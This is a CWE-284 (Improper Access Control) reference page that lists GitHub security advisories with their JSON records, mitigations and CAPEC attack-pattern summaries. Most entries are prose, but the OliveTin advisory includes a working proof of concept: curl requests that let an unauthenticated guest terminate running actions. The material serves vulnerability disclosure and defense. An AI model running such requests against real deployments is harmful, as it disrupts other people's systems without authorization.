CWE-284
DiscouragedImproper Access Control
Abstraction: Pillar · Status: Incomplete
The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
7803 vulnerabilities reference this CWE, most recent first.
GHSA-4F7J-PX6V-M38X
Vulnerability from github – Published: 2025-02-14 00:30 – Updated: 2025-03-17 21:30Wazuh SIEM version 4.8.2 is affected by a broken access control vulnerability. This issue allows the unauthorized creation of internal users without assigning any existing user role, potentially leading to privilege escalation or unauthorized access to sensitive resources.
{
"affected": [],
"aliases": [
"CVE-2024-57378"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-13T22:15:11Z",
"severity": "HIGH"
},
"details": "Wazuh SIEM version 4.8.2 is affected by a broken access control vulnerability. This issue allows the unauthorized creation of internal users without assigning any existing user role, potentially leading to privilege escalation or unauthorized access to sensitive resources.",
"id": "GHSA-4f7j-px6v-m38x",
"modified": "2025-03-17T21:30:30Z",
"published": "2025-02-14T00:30:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-57378"
},
{
"type": "WEB",
"url": "https://github.com/bappe-sarker/Vulnerability-Research/tree/main/CVE-2024-57378"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
]
}
GHSA-4F7P-MHH6-P6R7
Vulnerability from github – Published: 2022-05-17 03:38 – Updated: 2022-05-17 03:38The XML parser in Lifecycle Query Engine (LQE) in IBM Jazz Reporting Service 6.0 and 6.0.1 before 6.0.1 iFix006 allows remote authenticated administrators to read arbitrary files or cause a denial of service via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.
{
"affected": [],
"aliases": [
"CVE-2016-0319"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-11-25T20:59:00Z",
"severity": "HIGH"
},
"details": "The XML parser in Lifecycle Query Engine (LQE) in IBM Jazz Reporting Service 6.0 and 6.0.1 before 6.0.1 iFix006 allows remote authenticated administrators to read arbitrary files or cause a denial of service via an XML document containing an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.",
"id": "GHSA-4f7p-mhh6-p6r7",
"modified": "2022-05-17T03:38:37Z",
"published": "2022-05-17T03:38:37Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0319"
},
{
"type": "WEB",
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983137"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/92475"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4FG5-759R-24X3
Vulnerability from github – Published: 2025-02-20 18:31 – Updated: 2025-02-20 21:30DDSN Interactive cm3 Acora CMS version 10.1.1 contains an improper access control vulnerability. An editor-privileged user can access sensitive information, such as system administrator credentials, by force browsing the endpoint and exploiting the 'file' parameter. By referencing specific files (e.g., cm3.xml), attackers can bypass access controls, leading to account takeover and potential privilege escalation.
{
"affected": [],
"aliases": [
"CVE-2025-25968"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-20T18:15:26Z",
"severity": "MODERATE"
},
"details": "DDSN Interactive cm3 Acora CMS version 10.1.1 contains an improper access control vulnerability. An editor-privileged user can access sensitive information, such as system administrator credentials, by force browsing the endpoint and exploiting the \u0027file\u0027 parameter. By referencing specific files (e.g., cm3.xml), attackers can bypass access controls, leading to account takeover and potential privilege escalation.",
"id": "GHSA-4fg5-759r-24x3",
"modified": "2025-02-20T21:30:52Z",
"published": "2025-02-20T18:31:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-25968"
},
{
"type": "WEB",
"url": "https://github.com/padayali-JD/CVE-2025-25968"
},
{
"type": "WEB",
"url": "http://ddsn.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4FH5-7H44-VX78
Vulnerability from github – Published: 2022-05-17 03:52 – Updated: 2022-05-17 03:52The IBM Watson Developer Cloud services on Bluemix platforms do not properly generate random numbers for service-instance credentials, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack.
{
"affected": [],
"aliases": [
"CVE-2016-0391"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2016-07-02T14:59:00Z",
"severity": "CRITICAL"
},
"details": "The IBM Watson Developer Cloud services on Bluemix platforms do not properly generate random numbers for service-instance credentials, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack.",
"id": "GHSA-4fh5-7h44-vx78",
"modified": "2022-05-17T03:52:03Z",
"published": "2022-05-17T03:52:03Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0391"
},
{
"type": "WEB",
"url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982615"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4FJ3-HVJ6-PJ6H
Vulnerability from github – Published: 2025-08-09 21:30 – Updated: 2025-08-09 21:30A vulnerability classified as critical has been found in linlinjava litemall up to 1.8.0. Affected is the function Upload of the file /wx/storage/upload. The manipulation of the argument File leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
{
"affected": [],
"aliases": [
"CVE-2025-8764"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-08-09T19:15:32Z",
"severity": "MODERATE"
},
"details": "A vulnerability classified as critical has been found in linlinjava litemall up to 1.8.0. Affected is the function Upload of the file /wx/storage/upload. The manipulation of the argument File leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.",
"id": "GHSA-4fj3-hvj6-pj6h",
"modified": "2025-08-09T21:30:22Z",
"published": "2025-08-09T21:30:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8764"
},
{
"type": "WEB",
"url": "https://github.com/linlinjava/litemall/issues/567"
},
{
"type": "WEB",
"url": "https://github.com/linlinjava/litemall/issues/567#issue-3268166914"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.319266"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.319266"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.623957"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-4FM5-C8MR-GHGF
Vulnerability from github – Published: 2024-08-14 15:31 – Updated: 2024-08-14 15:31improper access control in firmware for some Intel(R) FPGA products before version 24.1 may allow a privileged user to enable escalation of privilege via local access.
{
"affected": [],
"aliases": [
"CVE-2024-25576"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-14T14:15:23Z",
"severity": "HIGH"
},
"details": "improper access control in firmware for some Intel(R) FPGA products before version 24.1 may allow a privileged user to enable escalation of privilege via local access.",
"id": "GHSA-4fm5-c8mr-ghgf",
"modified": "2024-08-14T15:31:15Z",
"published": "2024-08-14T15:31:15Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-25576"
},
{
"type": "WEB",
"url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01087.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-4FP9-VJR2-55J3
Vulnerability from github – Published: 2026-03-25 03:31 – Updated: 2026-03-25 15:31A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, visionOS 26.4. An app may be able to enumerate a user's installed apps.
{
"affected": [],
"aliases": [
"CVE-2026-28833"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-25T01:17:08Z",
"severity": "MODERATE"
},
"details": "A permissions issue was addressed with additional restrictions. This issue is fixed in iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, visionOS 26.4. An app may be able to enumerate a user\u0027s installed apps.",
"id": "GHSA-4fp9-vjr2-55j3",
"modified": "2026-03-25T15:31:28Z",
"published": "2026-03-25T03:31:31Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28833"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/126792"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/126794"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/126799"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-4FQM-6FMH-82MQ
Vulnerability from github – Published: 2026-03-02 21:42 – Updated: 2026-03-05 22:49Summary
OliveTin allows an unauthenticated guest to terminate running actions through KillAction even when authRequireGuestsToLogin: true is enabled. In the tested release (3000.10.2), guests are correctly blocked from dashboard access, but an still call the KillAction RPC directly and successfully stop a running action. This is a broken access control issue that causes unauthorized denial of service against legitimate action executions.
Details
The issue is caused by inconsistent authorization enforcement between dashboard access and action-control RPCs.
KillAction() authenticates the caller and applies only the per-action kill ACL check:
- service/internal/api/api.go:62
However, it does not enforce the guest login requirement. The guest/login gate exists separately in:
- service/internal/api/api.go:474
That gate is used by dashboard-style methods, but not by KillAction.
In addition, when authRequireGuestsToLogin is enabled, config sanitization disables guest view, exec, and logs permissions, but leaves kill unchanged:
- service/internal/config/sanitize.go:160
Specifically:
- DefaultPermissions.View = false
- DefaultPermissions.Exec = false
- DefaultPermissions.Logs = false
- DefaultPermissions.Kill remains unchanged
As a result, in the default configuration path where Kill remains allowed, an unauthenticated guest user can still satisfy IsAllowedKill():
- service/internal/acl/acl.go:133
I validated this behavior on a clean 3000.10.2 setup:
- guests were denied access to GetDashboard
- an authenticated admin user started a long-running action
- an unauthenticated guest successfully called KillAction
- the action was terminated
This confirms a real authorization bypass affecting action termination.
PoC
Tested version:
3000.10.2
- Create a minimal config:
mkdir -p /tmp/olivetin-kill-bypass
cat > /tmp/olivetin-kill-bypass/config.yaml <<'YAML'
listenAddressSingleHTTPFrontend: 0.0.0.0:1337
logLevel: "DEBUG"
checkForUpdates: false
authRequireGuestsToLogin: true
authLocalUsers:
enabled: true
users:
- username: "admin"
usergroup: "admin"
password: "$argon2id$v=19$m=65536,t=4,p=2$JLk85PhCL7RPboAlsYO4Lw$bQj6uhKnBpisbGRhe271cEt59S9EqYrHKeCfykypbZ4"
accessControlLists:
- name: adminall
addToEveryAction: true
matchUsernames: ["admin"]
permissions:
view: true
exec: true
logs: true
kill: true
actions:
- title: long-running
id: long-running
shell: sleep 20
timeout: 30
YAML
- Start OliveTin 3000.10.2:
docker rm -f olivetin-kill-bypass 2>/dev/null || true
docker run -d --name olivetin-kill-bypass \
-p 1347:1337 \
-v /tmp/olivetin-kill-bypass:/config:ro \
ghcr.io/olivetin/olivetin:3000.10.2
- Confirm the server is ready:
curl -i http://127.0.0.1:1347/readyz
- Prove guests are blocked from dashboard access:
curl -i -X POST http://127.0.0.1:1347/api/GetDashboard \
-H 'Content-Type: application/json' \
--data '{"title":"default"}'
Observed response:
HTTP/1.1 403 Forbidden
{"code":"permission_denied","message":"guests are not allowed to access the dashboard"}
- Log in as admin:
curl -c /tmp/ot_admin_cookie.txt -i -X POST http://127.0.0.1:1347/api/LocalUserLogin \
-H 'Content-Type: application/json' \
--data '{"username":"admin","password":"SecretPass123!"}'
- Start a long-running action as admin:
curl -i -b /tmp/ot_admin_cookie.txt -X POST http://127.0.0.1:1347/api/StartAction \
-H 'Content-Type: application/json' \
--data '{"bindingId":"long-running","arguments":[],"uniqueTrackingId":"kill-hunt-1"}'
Observed response:
HTTP/1.1 200 OK
{"executionTrackingId":"kill-hunt-1"}
- Kill it as an unauthenticated guest:
curl -i -X POST http://127.0.0.1:1347/api/KillAction \
-H 'Content-Type: application/json' \
--data '{"executionTrackingId":"kill-hunt-1"}'
Observed response:
HTTP/1.1 200 OK
{"executionTrackingId":"kill-hunt-1","killed":true,"alreadyCompleted":false,"found":true}
- Confirm in container logs:
docker logs olivetin-kill-bypass 2>&1 | tail -n 120
Observed relevant lines:
Authenticated API request ... path="/olivetin.api.v1.OliveTinApiService/GetDashboard" ... username="guest"
Authenticated API request ... path="/olivetin.api.v1.OliveTinApiService/StartAction" ... username="admin"
Action started actionTitle="long-running"
Authenticated API request ... path="/olivetin.api.v1.OliveTinApiService/KillAction" ... username="guest"
Killing execution request by tracking ID: kill-hunt-1
Action finished actionTitle="long-running" exit="-1"
This proves:
- guests are denied dashboard access
- guests can still invoke KillAction
- the running action is successfully terminated by an unauthenticated user
Impact
This is an unauthenticated broken access control vulnerability resulting in denial of service.
An unauthenticated guest can:
- terminate active jobs started by legitimate users
- disrupt long-running administrative or operational workflows
- interfere with privileged actions without being allowed to log in
Who is impacted:
- OliveTin deployments with authRequireGuestsToLogin: true
- multi-user environments where actions may run for meaningful durations
- operational environments where stopping a running action can interrupt maintenance, deployment, backup, or service-control tasks
This issue does not require valid credentials, only knowledge of a live executionTrackingId. That still makes it a real and exploitable availability issue in environments where execution identifiers can be observed or predicted through adjacent leaks or shared operator knowledge.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/OliveTin/OliveTin"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260302002902-d9804182eae4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-28790"
],
"database_specific": {
"cwe_ids": [
"CWE-284",
"CWE-862",
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-02T21:42:12Z",
"nvd_published_at": "2026-03-05T20:16:16Z",
"severity": "HIGH"
},
"details": "### Summary\n\nOliveTin allows an unauthenticated guest to terminate running actions through KillAction even when authRequireGuestsToLogin: true is enabled. In the tested release (3000.10.2), guests are correctly blocked from dashboard access, but an still call the KillAction RPC directly and successfully stop a running action. This is a broken access control issue that causes unauthorized denial of service against legitimate action executions.\n\n\n\n\n### Details\nThe issue is caused by inconsistent authorization enforcement between dashboard access and action-control RPCs.\n\n KillAction() authenticates the caller and applies only the per-action kill ACL check:\n\n - service/internal/api/api.go:62\n\n However, it does not enforce the guest login requirement. The guest/login gate exists separately in:\n\n - service/internal/api/api.go:474\n\n That gate is used by dashboard-style methods, but not by KillAction.\n\n In addition, when authRequireGuestsToLogin is enabled, config sanitization disables guest view, exec, and logs permissions, but leaves kill unchanged:\n\n - service/internal/config/sanitize.go:160\n\n Specifically:\n\n - DefaultPermissions.View = false\n - DefaultPermissions.Exec = false\n - DefaultPermissions.Logs = false\n - DefaultPermissions.Kill remains unchanged\n\n As a result, in the default configuration path where Kill remains allowed, an unauthenticated guest user can still satisfy IsAllowedKill():\n\n - service/internal/acl/acl.go:133\n\n I validated this behavior on a clean 3000.10.2 setup:\n\n - guests were denied access to GetDashboard\n - an authenticated admin user started a long-running action\n - an unauthenticated guest successfully called KillAction\n - the action was terminated\n\n This confirms a real authorization bypass affecting action termination.\n\n\n### PoC\n Tested version:\n```\n 3000.10.2\n```\n 1. Create a minimal config:\n```bash\n mkdir -p /tmp/olivetin-kill-bypass\n cat \u003e /tmp/olivetin-kill-bypass/config.yaml \u003c\u003c\u0027YAML\u0027\n listenAddressSingleHTTPFrontend: 0.0.0.0:1337\n logLevel: \"DEBUG\"\n checkForUpdates: false\n\n authRequireGuestsToLogin: true\n authLocalUsers:\n enabled: true\n users:\n - username: \"admin\"\n usergroup: \"admin\"\n password: \"$argon2id$v=19$m=65536,t=4,p=2$JLk85PhCL7RPboAlsYO4Lw$bQj6uhKnBpisbGRhe271cEt59S9EqYrHKeCfykypbZ4\"\n\n accessControlLists:\n - name: adminall\n addToEveryAction: true\n matchUsernames: [\"admin\"]\n permissions:\n view: true\n exec: true\n logs: true\n kill: true\n\n actions:\n - title: long-running\n id: long-running\n shell: sleep 20\n timeout: 30\n YAML\n```\n 2. Start OliveTin 3000.10.2:\n```bash\n docker rm -f olivetin-kill-bypass 2\u003e/dev/null || true\n docker run -d --name olivetin-kill-bypass \\\n -p 1347:1337 \\\n -v /tmp/olivetin-kill-bypass:/config:ro \\\n ghcr.io/olivetin/olivetin:3000.10.2\n```\n 3. Confirm the server is ready:\n```bash\n curl -i http://127.0.0.1:1347/readyz\n```\n 4. Prove guests are blocked from dashboard access:\n```bash\n curl -i -X POST http://127.0.0.1:1347/api/GetDashboard \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"title\":\"default\"}\u0027\n\n Observed response:\n\n HTTP/1.1 403 Forbidden\n {\"code\":\"permission_denied\",\"message\":\"guests are not allowed to access the dashboard\"}\n```\n 5. Log in as admin:\n```bash\n curl -c /tmp/ot_admin_cookie.txt -i -X POST http://127.0.0.1:1347/api/LocalUserLogin \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"username\":\"admin\",\"password\":\"SecretPass123!\"}\u0027\n```\n 6. Start a long-running action as admin:\n```bash\n curl -i -b /tmp/ot_admin_cookie.txt -X POST http://127.0.0.1:1347/api/StartAction \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"bindingId\":\"long-running\",\"arguments\":[],\"uniqueTrackingId\":\"kill-hunt-1\"}\u0027\n\n Observed response:\n\n HTTP/1.1 200 OK\n {\"executionTrackingId\":\"kill-hunt-1\"}\n```\n 7. Kill it as an unauthenticated guest:\n```bash\n curl -i -X POST http://127.0.0.1:1347/api/KillAction \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data \u0027{\"executionTrackingId\":\"kill-hunt-1\"}\u0027\n```\n Observed response:\n```bash\n HTTP/1.1 200 OK\n {\"executionTrackingId\":\"kill-hunt-1\",\"killed\":true,\"alreadyCompleted\":false,\"found\":true}\n```\n 8. Confirm in container logs:\n```bash\n docker logs olivetin-kill-bypass 2\u003e\u00261 | tail -n 120\n```\n Observed relevant lines:\n```bash\n Authenticated API request ... path=\"/olivetin.api.v1.OliveTinApiService/GetDashboard\" ... username=\"guest\"\n Authenticated API request ... path=\"/olivetin.api.v1.OliveTinApiService/StartAction\" ... username=\"admin\"\n Action started actionTitle=\"long-running\"\n Authenticated API request ... path=\"/olivetin.api.v1.OliveTinApiService/KillAction\" ... username=\"guest\"\n Killing execution request by tracking ID: kill-hunt-1\n Action finished actionTitle=\"long-running\" exit=\"-1\"\n```\n This proves:\n\n - guests are denied dashboard access\n - guests can still invoke KillAction\n - the running action is successfully terminated by an unauthenticated user\n\n\n### Impact\nThis is an unauthenticated broken access control vulnerability resulting in denial of service.\n\n An unauthenticated guest can:\n\n - terminate active jobs started by legitimate users\n - disrupt long-running administrative or operational workflows\n - interfere with privileged actions without being allowed to log in\n\n Who is impacted:\n\n - OliveTin deployments with authRequireGuestsToLogin: true\n - multi-user environments where actions may run for meaningful durations\n - operational environments where stopping a running action can interrupt maintenance, deployment, backup, or service-control tasks\n\n This issue does not require valid credentials, only knowledge of a live executionTrackingId. That still makes it a real and exploitable availability issue in environments where execution identifiers can be observed or predicted\n through adjacent leaks or shared operator knowledge.",
"id": "GHSA-4fqm-6fmh-82mq",
"modified": "2026-03-05T22:49:37Z",
"published": "2026-03-02T21:42:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-4fqm-6fmh-82mq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28790"
},
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/commit/d9804182eae43cf49f735e6533ddbe1541c2b9a9"
},
{
"type": "PACKAGE",
"url": "https://github.com/OliveTin/OliveTin"
},
{
"type": "WEB",
"url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.11.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "OliveTin has Unauthenticated Action Termination via KillAction When Guests Must Login"
}
GHSA-4FR9-73W7-J6W3
Vulnerability from github – Published: 2022-05-17 00:29 – Updated: 2022-05-17 00:29MediaWiki before 1.18.5, and 1.19.x before 1.19.2 allows remote attackers to bypass GlobalBlocking extension IP address blocking and create an account via unspecified vectors.
{
"affected": [],
"aliases": [
"CVE-2012-4380"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-10-19T21:29:00Z",
"severity": "HIGH"
},
"details": "MediaWiki before 1.18.5, and 1.19.x before 1.19.2 allows remote attackers to bypass GlobalBlocking extension IP address blocking and create an account via unspecified vectors.",
"id": "GHSA-4fr9-73w7-j6w3",
"modified": "2022-05-17T00:29:22Z",
"published": "2022-05-17T00:29:22Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2012-4380"
},
{
"type": "WEB",
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=686330"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=853440"
},
{
"type": "WEB",
"url": "https://lists.wikimedia.org/pipermail/mediawiki-announce/2012-August/000119.html"
},
{
"type": "WEB",
"url": "https://phabricator.wikimedia.org/T41824"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2012/08/31/10"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2012/08/31/6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-4G62-MFWX-4Q48
Vulnerability from github – Published: 2022-05-13 01:21 – Updated: 2024-10-22 17:25slixmpp version before commit 7cd73b594e8122dddf847953fcfc85ab4d316416 contains an incorrect Access Control vulnerability in XEP-0223 plugin (Persistent Storage of Private Data via PubSub) options profile, used for the configuration of default access model that can result in all of the contacts of the victim can see private data having been published to a PEP node. This attack appears to be exploitable if the user of this library publishes any private data on PEP, the node isn't configured to be private. This vulnerability appears to have been fixed in commit 7cd73b594e8122dddf847953fcfc85ab4d316416 which is included in slixmpp 1.4.2.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "slixmpp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2019-1000021"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2023-07-19T18:13:30Z",
"nvd_published_at": "2019-02-04T21:29:00Z",
"severity": "HIGH"
},
"details": "slixmpp version before commit 7cd73b594e8122dddf847953fcfc85ab4d316416 contains an incorrect Access Control vulnerability in XEP-0223 plugin (Persistent Storage of Private Data via PubSub) options profile, used for the configuration of default access model that can result in all of the contacts of the victim can see private data having been published to a PEP node. This attack appears to be exploitable if the user of this library publishes any private data on PEP, the node isn\u0027t configured to be private. This vulnerability appears to have been fixed in commit 7cd73b594e8122dddf847953fcfc85ab4d316416 which is included in slixmpp 1.4.2.",
"id": "GHSA-4g62-mfwx-4q48",
"modified": "2024-10-22T17:25:28Z",
"published": "2022-05-13T01:21:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1000021"
},
{
"type": "WEB",
"url": "https://github.com/poezio/slixmpp/commit/7cd73b594e8122dddf847953fcfc85ab4d316416"
},
{
"type": "PACKAGE",
"url": "https://github.com/poezio/slixmpp"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/slixmpp/PYSEC-2019-121.yaml"
},
{
"type": "WEB",
"url": "https://lab.louiz.org/poezio/slixmpp/commit/7cd73b594e8122dddf847953fcfc85ab4d316416"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GKBXN7EAAR7ENEZUBKV6C6MP6QBXYTWT"
},
{
"type": "WEB",
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WIBP4LD2V4TBJSLZXDUAGQMD6CUI2TZR"
},
{
"type": "WEB",
"url": "https://xmpp.org/extensions/xep-0223.html#howitworks"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "slixmpp Incorrect Access Control"
}
Mitigation MIT-1
Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.
Mitigation MIT-46
Strategy: Separation of Privilege
- Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.
- Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges.
CAPEC-19: Embedding Scripts within Scripts
An adversary leverages the capability to execute their own script by embedding it within other scripts that the target software is likely to execute due to programs' vulnerabilities that are brought on by allowing remote hosts to execute scripts.
CAPEC-441: Malicious Logic Insertion
An adversary installs or adds malicious logic (also known as malware) into a seemingly benign component of a fielded system. This logic is often hidden from the user of the system and works behind the scenes to achieve negative impacts. With the proliferation of mass digital storage and inexpensive multimedia devices, Bluetooth and 802.11 support, new attack vectors for spreading malware are emerging for things we once thought of as innocuous greeting cards, picture frames, or digital projectors. This pattern of attack focuses on systems already fielded and used in operation as opposed to systems and their components that are still under development and part of the supply chain.
CAPEC-478: Modification of Windows Service Configuration
An adversary exploits a weakness in access control to modify the execution parameters of a Windows service. The goal of this attack is to execute a malicious binary in place of an existing service.
CAPEC-479: Malicious Root Certificate
An adversary exploits a weakness in authorization and installs a new root certificate on a compromised system. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials.
CAPEC-502: Intent Spoof
An adversary, through a previously installed malicious application, issues an intent directed toward a specific trusted application's component in an attempt to achieve a variety of different objectives including modification of data, information disclosure, and data injection. Components that have been unintentionally exported and made public are subject to this type of an attack. If the component trusts the intent's action without verififcation, then the target application performs the functionality at the adversary's request, helping the adversary achieve the desired negative technical impact.
CAPEC-503: WebView Exposure
An adversary, through a malicious web page, accesses application specific functionality by leveraging interfaces registered through WebView's addJavascriptInterface API. Once an interface is registered to WebView through addJavascriptInterface, it becomes global and all pages loaded in the WebView can call this interface.
CAPEC-536: Data Injected During Configuration
An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.
CAPEC-546: Incomplete Data Deletion in a Multi-Tenant Environment
An adversary obtains unauthorized information due to insecure or incomplete data deletion in a multi-tenant environment. If a cloud provider fails to completely delete storage and data from former cloud tenants' systems/resources, once these resources are allocated to new, potentially malicious tenants, the latter can probe the provided resources for sensitive information still there.
CAPEC-550: Install New Service
When an operating system starts, it also starts programs called services or daemons. Adversaries may install a new service which will be executed at startup (on a Windows system, by modifying the registry). The service name may be disguised by using a name from a related operating system or benign software. Services are usually run with elevated privileges.
CAPEC-551: Modify Existing Service
When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used.
CAPEC-552: Install Rootkit
An adversary exploits a weakness in authentication to install malware that alters the functionality and information provide by targeted operating system API calls. Often referred to as rootkits, it is often used to hide the presence of programs, files, network connections, services, drivers, and other system components.
CAPEC-556: Replace File Extension Handlers
When a file is opened, its file handler is checked to determine which program opens the file. File handlers are configuration properties of many operating systems. Applications can modify the file handler for a given file extension to call an arbitrary program when a file with the given extension is opened.
